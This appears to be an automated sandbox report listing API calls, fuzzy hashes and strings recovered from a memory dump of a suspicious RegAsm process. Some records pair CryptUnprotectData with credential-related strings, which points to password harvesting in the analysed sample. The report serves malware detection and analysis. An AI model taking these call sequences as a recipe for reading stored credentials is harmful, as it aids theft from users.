                          Similarity
                          • API ID: PrivateProfile$StringWrite_itowmemset
                          • String ID:
                          • API String ID: 4232544981-0
                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                          APIs
                          • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                          APIs
                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileModuleName
                          • String ID:
                          • API String ID: 514040917-0
                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                          APIs
                          • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                          APIs
                          • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                          APIs
                          • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                          APIs
                          • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                          APIs
                          • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          APIs
                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: EnumNamesResource
                          • String ID:
                          • API String ID: 3334572018-0
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          APIs
                          • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          APIs
                          • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          • memset.MSVCRT ref: 004095FC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                          • String ID:
                          • API String ID: 3655998216-0
                          APIs
                          • memset.MSVCRT ref: 00445426
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                          • String ID:
                          • API String ID: 1828521557-0
                          APIs
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@FilePointermemcpy
                          • String ID:
                          • API String ID: 609303285-0
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID:
                          • API String ID: 2081463915-0
                          APIs
                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastRead
                          • String ID:
                          • API String ID: 2136311172-0
                          APIs
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@??3@
                          • String ID:
                          • API String ID: 1936579350-0
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          APIs
                          • EmptyClipboard.USER32 ref: 004098EC
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                          • GetLastError.KERNEL32 ref: 0040995D
                          • CloseHandle.KERNEL32(?), ref: 00409969
                          • GetLastError.KERNEL32 ref: 00409974
                          • CloseClipboard.USER32 ref: 0040997D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                          • String ID:
                          • API String ID: 3604893535-0
                          APIs
                          • EmptyClipboard.USER32 ref: 00409882
                          • wcslen.MSVCRT ref: 0040988F
                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                          • CloseClipboard.USER32 ref: 004098D7
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                          • String ID:
                          • API String ID: 1213725291-0
                          APIs
                          • GetLastError.KERNEL32 ref: 004182D7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                          • LocalFree.KERNEL32(?), ref: 00418342
                          • free.MSVCRT ref: 00418370
                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                          • String ID: OsError 0x%x (%u)
                          • API String ID: 2360000266-2664311388
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          APIs
                          • _wcsicmp.MSVCRT ref: 004022A6
                          • _wcsicmp.MSVCRT ref: 004022D7
                          • _wcsicmp.MSVCRT ref: 00402305
                          • _wcsicmp.MSVCRT ref: 00402333
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                          • memset.MSVCRT ref: 0040265F
                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                          • API String ID: 2257402768-1134094380
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                          • String ID: :stringdata$ftp://$http://$https://
                          • API String ID: 2787044678-1921111777
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                          • GetWindowRect.USER32(?,?), ref: 00414088
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                          • GetDC.USER32 ref: 004140E3
                          • wcslen.MSVCRT ref: 00414123
                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                          • ReleaseDC.USER32(?,?), ref: 00414181
                          • _snwprintf.MSVCRT ref: 00414244
                          • SetWindowTextW.USER32(?,?), ref: 00414258
                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                          • GetClientRect.USER32(?,?), ref: 004142E1
                          • GetWindowRect.USER32(?,?), ref: 004142EB
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                          • GetClientRect.USER32(?,?), ref: 0041433B
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                          • String ID: %s:$EDIT$STATIC
                          • API String ID: 2080319088-3046471546
                          APIs
                          • EndDialog.USER32(?,?), ref: 00413221
                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                          • memset.MSVCRT ref: 00413292
                          • memset.MSVCRT ref: 004132B4
                          • memset.MSVCRT ref: 004132CD
                          • memset.MSVCRT ref: 004132E1
                          • memset.MSVCRT ref: 004132FB
                          • memset.MSVCRT ref: 00413310
                          • GetCurrentProcess.KERNEL32 ref: 00413318
                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                          • memset.MSVCRT ref: 004133C0
                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                          • wcscpy.MSVCRT ref: 0041341F
                          • _snwprintf.MSVCRT ref: 0041348E
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                          • SetFocus.USER32(00000000), ref: 004134B7
                          Strings
                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                          • {Unknown}, xrefs: 004132A6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                          • API String ID: 4111938811-1819279800
                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                          • SetCursor.USER32(00000000), ref: 0040129E
                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                          • EndDialog.USER32(?,?), ref: 0040135E
                          • DeleteObject.GDI32(?), ref: 0040136A
                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                          • ShowWindow.USER32(00000000), ref: 00401398
                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                          • ShowWindow.USER32(00000000), ref: 004013A7
                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                          • String ID:
                          • API String ID: 829165378-0
                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
